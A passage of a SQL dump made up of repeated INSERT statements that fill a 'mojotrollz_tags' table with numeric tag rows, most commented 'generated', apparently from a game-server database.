`type`, `value`, `comment`) VALUES (16398, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16399, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16399, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16400, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16400, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16400, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16401, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16416, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16416, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16417, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16417, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16418, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16418, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16418, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16418, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16418, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16419, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16420, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16421, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16422, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16423, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16427, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16428, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16429, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16430, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16431, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16432, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16433, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16434, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16435, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16436, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16437, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16438, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16439, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16440, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16441, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16446, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16446, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16446, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16447, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16447, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16447, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16448, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16448, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16448, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16449, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16449, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16449, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16451, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16451, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16451, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16452, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16452, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16452, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16453, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16453, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16453, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16458, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16458, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16474, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16478, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16479, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16484, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16486, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16490, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16493, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16494, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16495, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16505, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16505, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16505, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16506, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16506, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16506, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16508, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16509, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16510, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16511, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16512, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16513, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16531, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16543, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16543, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16547, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16548, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16549, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16573, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16573, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16573, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16592, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16592, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16604, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16604, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16604, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16606, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16697, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16698, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16701, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16775, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16776, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16777, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16778, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16779, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16781, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16781, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16786, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16787, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16788, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16803, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16803, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16803, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16817, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16817, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16818, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16818, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16861, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16861, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16861, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16979, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16980, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16980, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16980, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16981, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16982, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16983, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16984, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16985, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16986, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16987, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16988, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16989, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16990, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16995, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16998, 1, 1, 533, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16998, 1, 2, 3456, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16998, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17003, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17038, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17041, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17048, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17049, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17050, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17051, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17055, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17066, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17066, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17068, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17068, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17069, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17069, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17070, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17070, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17072, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17072, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17074, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17074, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17079, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17079, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17080, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17080, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17081, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17081, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17082, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17082, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17090, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17090, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17209, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17231, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17249, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17249, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17252, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17266, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17598, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17598, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17635, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17647, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17688, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17689, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17689, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17690, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17690, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17691, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17696, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17696, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17697, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17698, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17698, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17699, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17719, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17720, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17765, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17765, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17766, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17766, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17794, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17795, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17795, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17804, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17804, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17995, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (17996, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18199, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (18199, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (31, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (32, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (33, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (34, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (35, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (36, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (37, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (41, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (47, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (52, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (54, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (55, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (56, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (57, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (58, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (59, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (60, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (68, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (76, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (80, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (81, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (82, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (83, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (84, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (85, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (86, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (87, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (88, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (89, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (90, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (91, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (93, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (94, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (95, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, 